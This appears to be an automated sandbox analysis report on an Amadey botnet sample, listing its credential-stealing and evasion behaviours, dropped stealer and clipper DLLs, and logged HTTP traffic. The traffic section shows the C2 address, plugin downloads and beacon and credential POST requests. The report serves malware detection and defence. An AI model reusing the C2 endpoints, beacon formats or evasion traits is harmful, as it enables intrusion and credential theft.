Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
Analysis ID: 1428513
MD5: 6afd3b5b7effe4bb0500fe08dd1f6ed7
SHA1: c0b8d6e8b660aa79851bd237c162ed437d3c047c
SHA256: 441adf73dcc0324843d1e42824e7e9473960c859c748a87ac7af4460535aaf2f
Tags: Amadeyexe
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.pjgxt
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Found malware configuration
Source: 11.2.rundll32.exe.6c980000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": ["193.233.132.56/Pneh2sXQk0/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://193.233.132.56/Pneh2sXQk0/index.phpg Virustotal: Detection: 5% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllv Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/l Virustotal: Detection: 18% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php Virustotal: Detection: 20% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php3 Virustotal: Detection: 5% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll Virustotal: Detection: 21% Perma Link
Source: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s Virustotal: Detection: 19% Perma Link
Source: http://193.233.132.56/ Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Virustotal: Detection: 78% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Virustotal: Detection: 54% Perma Link
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Virustotal: Detection: 78% Perma Link
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Virustotal: Detection: 54% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 11.2.rundll32.exe.6c980000.0.unpack String decryptor: 193.233.132.56
Source: 11.2.rundll32.exe.6c980000.0.unpack String decryptor: /Pneh2sXQk0/index.php
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr, cred64.dll.6.dr
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49735 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49742 -> 193.233.132.56:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49744 -> 193.233.132.56:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 193.233.132.56
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 02:26:04 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 03 Mar 2024 11:54:33 GMTConnection: keep-aliveETag: "65e464f9-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 69 12 e4 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 02:26:07 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 03 Mar 2024 11:54:32 GMTConnection: keep-aliveETag: "65e464f8-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
